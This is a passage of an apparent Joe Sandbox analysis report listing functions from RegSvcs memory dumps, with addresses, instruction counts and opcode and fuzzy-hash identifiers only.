                                                            • Opcode Fuzzy Hash: cb93acfdcd509b41839004f58bbd8d9b0a33ca0448816f3720809b7367222fb4
                                                            • Instruction Fuzzy Hash: 96E17F70F1020A9FEB54DB68D8546AEBFB6FF89300F208969D405EB395DB359C46CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B09210 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd3f0ac77125a7d2d0e1013ec047b1dbd4d13aa7910fa1b5ba13973ae225fcdb
                                                            • Instruction ID: fda7354deb6e335da5bf5dd1ea370ca588782de8010927d6d4abbf8f74a9ee1f
                                                            • Opcode Fuzzy Hash: fd3f0ac77125a7d2d0e1013ec047b1dbd4d13aa7910fa1b5ba13973ae225fcdb
                                                            • Instruction Fuzzy Hash: C2917370B0111A9FEB94DB68D850BAE77F6FFC9300F1095A5C409AB395EB34DC428B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B062B0 Relevance: .2, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 515c288de917c60a781bf251c52817cb853260fa6d06e7311a2b5d7ec906f081
                                                            • Instruction ID: cb8237b366119b23c796fe21f7e7e71abf1b2aa5c4579d81a4885aa16bf0ea9d
                                                            • Opcode Fuzzy Hash: 515c288de917c60a781bf251c52817cb853260fa6d06e7311a2b5d7ec906f081
                                                            • Instruction Fuzzy Hash: D261B1B2F001224BDF509A7DD89466FBED7EFD4220B154079E80ADB364EE65EC0287D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0435A Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31d62cb45fd79e0ad95bd46855171a99d5a1a7ce4512661473bb05339649b736
                                                            • Instruction ID: a3ff09ed2d2082e49b3e3a11118c1bc5db3b46279c98a23bb8981ff14cac29b0
                                                            • Opcode Fuzzy Hash: 31d62cb45fd79e0ad95bd46855171a99d5a1a7ce4512661473bb05339649b736
                                                            • Instruction Fuzzy Hash: 43813E74B012469BEF54DFA9D4547AEBBF2EF89300F108469D50ADB394EB34DC428B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B04674 Relevance: .2, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4af3c51b192a94ab6a67eb7e4be716bfb1c68be4ff7c231e14bded23957b4881
                                                            • Instruction ID: ed69a7515fd5dd3b38b746107fcd77429b17a3dff4390b27d3ac7699de39c421
                                                            • Opcode Fuzzy Hash: 4af3c51b192a94ab6a67eb7e4be716bfb1c68be4ff7c231e14bded23957b4881
                                                            • Instruction Fuzzy Hash: 01912E70E1021ACFDF60DF68C850B9DBBB1FF85310F208599D549AB295DB70A985CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B04688 Relevance: .2, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3107f0c7f3cf0a3e616f8479f62dac29dc1c4ae39a3147207139318a5891c0ba
                                                            • Instruction ID: 6015e022208bf301bae11244e2b4a0e1ae46a22f8bb4c9cecbf6775fbcb86c1f
                                                            • Opcode Fuzzy Hash: 3107f0c7f3cf0a3e616f8479f62dac29dc1c4ae39a3147207139318a5891c0ba
                                                            • Instruction Fuzzy Hash: 29913E70E1061ACBDF60DF68C890B9DBBB1FF89310F208599D549AB395DB70A985CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0EFC8 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a39cec1e955e776bb6ad253570c61ce07b61ad3c10e4d31550ef724f32d6507
                                                            • Instruction ID: 3ab2fd9d116d87085b2620cfed6fc660a01ac3fba2008fc1491793feffba2fae
                                                            • Opcode Fuzzy Hash: 9a39cec1e955e776bb6ad253570c61ce07b61ad3c10e4d31550ef724f32d6507
                                                            • Instruction Fuzzy Hash: 05711EB4B002499FDB54DFA9D990AADBBF6FF88304F148469E415EB254DB30EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0EFD8 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 749e1fb1d6315a9a230f38afabc8f8430fd52157ab82ca19a63ef3203c171a68
                                                            • Instruction ID: e88b660a86617edf8f26d4703c054eac6815c86804e6ba9f49539bf4c55a1435
                                                            • Opcode Fuzzy Hash: 749e1fb1d6315a9a230f38afabc8f8430fd52157ab82ca19a63ef3203c171a68
                                                            • Instruction Fuzzy Hash: C5710BB0B002499FEB54DBA9D990AADBBF6FF88304F148469D405EB294DB30EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B04C20 Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57c5cd0c53ce29e5b2d2f532a42f6b27c3c62fa94bb287d8ad0ea7c09fbe5e66
                                                            • Instruction ID: 7adfcf25f166c3d7374b6475bece2ccb6b67d15aba74596eba8f3d66ed3a44e0
                                                            • Opcode Fuzzy Hash: 57c5cd0c53ce29e5b2d2f532a42f6b27c3c62fa94bb287d8ad0ea7c09fbe5e66
                                                            • Instruction Fuzzy Hash: 8D615C71A00219DFEF549BA8C8547AEBBF6FB88300F20856AD606AB395DB754C058B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0FD29 Relevance: .2, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4de36efde4c67510576b4f421419ef6352ef34acda863445a04334a7ecbffdec
                                                            • Instruction ID: cae08ed865492d3c0454b583bca3d90000a546e71040fcf9aee952efaa60b834
                                                            • Opcode Fuzzy Hash: 4de36efde4c67510576b4f421419ef6352ef34acda863445a04334a7ecbffdec
                                                            • Instruction Fuzzy Hash: EB512370F01109DFEB64AB78E4846BDBFBAFB85311F1088A9E516D7290CB349846CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0FAD7 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dff15e9d7258315961f2c75ff12384250a2f3a3f328892dc356b5bc9104e096
                                                            • Instruction ID: 17df380221f78babe547490b2746c0bd0ab95c06df50a4e8d770a2583c453556
                                                            • Opcode Fuzzy Hash: 8dff15e9d7258315961f2c75ff12384250a2f3a3f328892dc356b5bc9104e096
                                                            • Instruction Fuzzy Hash: 945189B0B101049BFF74566CE86477F3E6EE79A310F20456AE90AC73D5C96DCC818BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B091FF Relevance: .2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a424c38319881837c1e7a825df381af8d2d09de4651c2afb10ee30b1de310f4e
                                                            • Instruction ID: 3975748636472bb7667afa4e853513e6a28dd3cab0d34fc9b3193ccc80e94a10
                                                            • Opcode Fuzzy Hash: a424c38319881837c1e7a825df381af8d2d09de4651c2afb10ee30b1de310f4e
                                                            • Instruction Fuzzy Hash: 33514E71B011469FEB94EB78E890B6E77F6FBC9300F149469C4099B395EA34DC428B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0FAE8 Relevance: .2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f3e47e5ed9a13735a0146352182121af051b2be487de0953a44f482c780f3fc
                                                            • Instruction ID: f151519d318ed9fb24cf90032c5ed921572a67a6fe43d3a17faf488c6bfed3ca
                                                            • Opcode Fuzzy Hash: 9f3e47e5ed9a13735a0146352182121af051b2be487de0953a44f482c780f3fc
                                                            • Instruction Fuzzy Hash: 465196B0B101049BFF74566CE8A477F3D6EE799350F20456AEA0AC73D5C969CC814BE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B054C8 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8148ddb496ff49c35f83578f66193441941dc7409077bd219289dd1230e0833
                                                            • Instruction ID: a99bc03a691a149e590065f091e60eb6803248c9c449076c41ffba018950e026
                                                            • Opcode Fuzzy Hash: d8148ddb496ff49c35f83578f66193441941dc7409077bd219289dd1230e0833
                                                            • Instruction Fuzzy Hash: 874170B6E006099FEF70CEA9D9806AEBFB2FB45210F10596AD255D7680D330E845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B04C10 Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1dbd07de75cccc9bbd87549314b6d9c1eb8a4a2dc671569c1f2c004dcb110ad1
                                                            • Instruction ID: f473d90ac52c8e3d7e08af7b2710cd1adaf27ade4c3d448c6ddab2535dac83c4
                                                            • Opcode Fuzzy Hash: 1dbd07de75cccc9bbd87549314b6d9c1eb8a4a2dc671569c1f2c004dcb110ad1
                                                            • Instruction Fuzzy Hash: EC415B70A00219DFEB549BA9C814BAEBBF6FF88300F208569E106AB395DB755C01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0DB6D Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb71748c242ee0425678a15d1e02abb12bfe78caa345ab8d3f5688659e38461f
                                                            • Instruction ID: 978ed4887c759b467f9c41740f9763401fb7081b31ddee51cde13c5a80ba2a8d
                                                            • Opcode Fuzzy Hash: eb71748c242ee0425678a15d1e02abb12bfe78caa345ab8d3f5688659e38461f
                                                            • Instruction Fuzzy Hash: 9F418170E1020A9FEB64DFA5C89469EBFB2FF86340F204569E402DB2C0DB74D846CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0228D Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5202a9b29b68caa9f28f6103d48952020b942946acc095fd2f90db4be1bfa5cf
                                                            • Instruction ID: afeac7cc1e856337392340cf5071b4907cc22197b235bea6e57d5589142fd360
                                                            • Opcode Fuzzy Hash: 5202a9b29b68caa9f28f6103d48952020b942946acc095fd2f90db4be1bfa5cf
                                                            • Instruction Fuzzy Hash: 1731AC30B002068FEBA99B74D4A866E7FF6EF8E200B5444A8D406DB395DA35DD49CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B022A0 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 548a665f0ab973992dc021f7d9b68444e1f52fc54c8fd205d2a36541c63c34bc
                                                            • Instruction ID: dafcc7d6f306af594c091da19cf14265c6ef52a72291775dd06193a1a9e639b2
                                                            • Opcode Fuzzy Hash: 548a665f0ab973992dc021f7d9b68444e1f52fc54c8fd205d2a36541c63c34bc
                                                            • Instruction Fuzzy Hash: 89318B70B002068FEBA89B74D46866E7EB6FB8D640F6044A8D406DB394EE35DD498BD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0DA21 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a262c2af3e5acb945b23c8b0f6814626777186a69cea87eff909ac6ed02db564
                                                            • Instruction ID: aa6217f03f928d9cd1fce5ef270f2b70bfc276e404d73a831895c0b0826a6c7e
                                                            • Opcode Fuzzy Hash: a262c2af3e5acb945b23c8b0f6814626777186a69cea87eff909ac6ed02db564
                                                            • Instruction Fuzzy Hash: 37318B70E1021A9BDF24DFB8D9507DEBFB5FF85300F104569E501EB280EB70A9468B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B02153 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2a0775119bcb144acf054f09910d90654c0895b2b28fd1dac36370b4afa3c26
                                                            • Instruction ID: 5777e8dad25626df424bf76785b4fbd87c9ce904d3c7cf11c1fed9b4e126ff05
                                                            • Opcode Fuzzy Hash: e2a0775119bcb144acf054f09910d90654c0895b2b28fd1dac36370b4afa3c26
                                                            • Instruction Fuzzy Hash: 1E316D70E102169FDB55DFA4D85869EBBB2FF89300F108569D906EB390DB30AD46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B02160 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5712e42fc4395a290c010c46870dd90bcb74cd9b3607cbebea681051c81fa64f
                                                            • Instruction ID: 169f6277b22ca2992d8ac5e2412265292eaa7a2b11968e6b13fdd64119655b6a
                                                            • Opcode Fuzzy Hash: 5712e42fc4395a290c010c46870dd90bcb74cd9b3607cbebea681051c81fa64f
                                                            • Instruction Fuzzy Hash: 6A319070E102169FDB59DFA4D85869EBBB2FF88300F10C569E906E7390DB30AD46CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B03F60 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b162a8a0c3c415126fbfd6d38874af6e8e4a3db51961aaa4b1818e386f737e5
                                                            • Instruction ID: 2fca6283d6fe996eed8423fac628b0427c0514172c7ed89a5dd37da99627d961
                                                            • Opcode Fuzzy Hash: 9b162a8a0c3c415126fbfd6d38874af6e8e4a3db51961aaa4b1818e386f737e5
                                                            • Instruction Fuzzy Hash: 5931A275F012059FEB50CFA8E980AAEBFF5EB88310F045069EA05E7390E735E8018B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B03F70 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a6568f57f981da7d7ead89c4bb5c592fe1eef0ca1eba8fef0550902d1b56ea6
                                                            • Instruction ID: aacefb856c89f19d9ac18e54bf94e494b483e99f0c524c763fdb28804639fb10
                                                            • Opcode Fuzzy Hash: 4a6568f57f981da7d7ead89c4bb5c592fe1eef0ca1eba8fef0550902d1b56ea6
                                                            • Instruction Fuzzy Hash: 42218175F012159FEB40CFA9E980AAEBBF6FB88310F105069E905E7390E735DD008B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0159D210 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305584054.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_159d000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab519c2fbf1373033c877f8f6d76274f4c0a7867d6663533ad9d050f3668bb9b
                                                            • Instruction ID: 211360ba1ac7421d7797932d1b1cc446beac1ed231cc0736ff280ff5c615682b
                                                            • Opcode Fuzzy Hash: ab519c2fbf1373033c877f8f6d76274f4c0a7867d6663533ad9d050f3668bb9b
                                                            • Instruction Fuzzy Hash: A421D672504244EFDF05DF94D9C4B2ABFB5FB88324F2485A9E9090F246C336D456CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B03511 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 525623eb8dd5cf84a754fea5610f9bcf2a892e79a52daa036ac8bad6d8358d7a
                                                            • Instruction ID: 84ba1c67a0a54e695e3a830eecbbc243503a627344f62cec567185f518afb53d
                                                            • Opcode Fuzzy Hash: 525623eb8dd5cf84a754fea5610f9bcf2a892e79a52daa036ac8bad6d8358d7a
                                                            • Instruction Fuzzy Hash: EE21C374E0021A9EDF989B78D8546DEBFF5FF89300F0045A9D506EB250DA31D941CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 015AD030 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305672148.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_15ad000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83ad4c31d5cd2596107858ceada61b8ae39ea855e61cfa30cb0ab1c641bbb482
                                                            • Instruction ID: 969bdf990297693333a32b6ec30bbef98017b44f6b202e09220f453ad075b2f0
                                                            • Opcode Fuzzy Hash: 83ad4c31d5cd2596107858ceada61b8ae39ea855e61cfa30cb0ab1c641bbb482
                                                            • Instruction Fuzzy Hash: EB213475684204EFDB11EF58D9C0B2ABBB1FB84314F60C96DD9090F642D33AD847CA62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 015AD006 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305672148.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_15ad000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac6b4274286d7ed0f044fa74e5db0ee9dc5a7c9fb28fdd574daca6c41eeff6d7
                                                            • Instruction ID: a9fdb6d1ea75e5a11b7d81787c5e8b536eae333e2015c88875db2005f2a079c3
                                                            • Opcode Fuzzy Hash: ac6b4274286d7ed0f044fa74e5db0ee9dc5a7c9fb28fdd574daca6c41eeff6d7
                                                            • Instruction Fuzzy Hash: 88218D751493C09FC703DF64D990715BF71BB46214F29C5DBD8888F6A3D23A980ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B042B9 Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e28f836d55698a9834a2d5fe2c50b6cfddfcdeb7752ad48bf1feb1132f0105c5
                                                            • Instruction ID: b093366825b7e4d400a71a448a9232d6fa4d4994392aa1e1bc23ab2abd321e57
                                                            • Opcode Fuzzy Hash: e28f836d55698a9834a2d5fe2c50b6cfddfcdeb7752ad48bf1feb1132f0105c5
                                                            • Instruction Fuzzy Hash: BB0128B1B111505BEFB5957C981075FBFDAEBCA310F148879E60AC7390DA61DC028392
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B04080 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9158e8219dd3b9253911c245b3e25de1c461caaee7c2e88480c5da705af4fa39
                                                            • Instruction ID: 66c9bd174c44c13ea533c442283fe40e115d2dbc9ffc45850a720175cf566e0f
                                                            • Opcode Fuzzy Hash: 9158e8219dd3b9253911c245b3e25de1c461caaee7c2e88480c5da705af4fa39
                                                            • Instruction Fuzzy Hash: 86118E71B101299BEB549A68DC106AF7BEAEBC9311F0044B9C606E7384EE659C028BD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0159D20B Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305584054.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_159d000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a958cd7c859b04241e3965f2995fa9ff46dd324e9e88069bdc96e2e9819e0d2
                                                            • Instruction ID: dad55231c8813dea90a85d46c06b9bd263efaf9b0757758f672e8248b247c76f
                                                            • Opcode Fuzzy Hash: 8a958cd7c859b04241e3965f2995fa9ff46dd324e9e88069bdc96e2e9819e0d2
                                                            • Instruction Fuzzy Hash: 59218C76504284DFCF06CF54D9C4B1ABF72FB88324F2485A9D9090A656C33AD41ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0F248 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d72836b61dcb42de63cf79c829be4d7de3ae422f798ccc14013c9639b3e2dc7c
                                                            • Instruction ID: 740c47cdc20f842d3957ba8515c5f4a659731dae2df46569f69e5890943911e7
                                                            • Opcode Fuzzy Hash: d72836b61dcb42de63cf79c829be4d7de3ae422f798ccc14013c9639b3e2dc7c
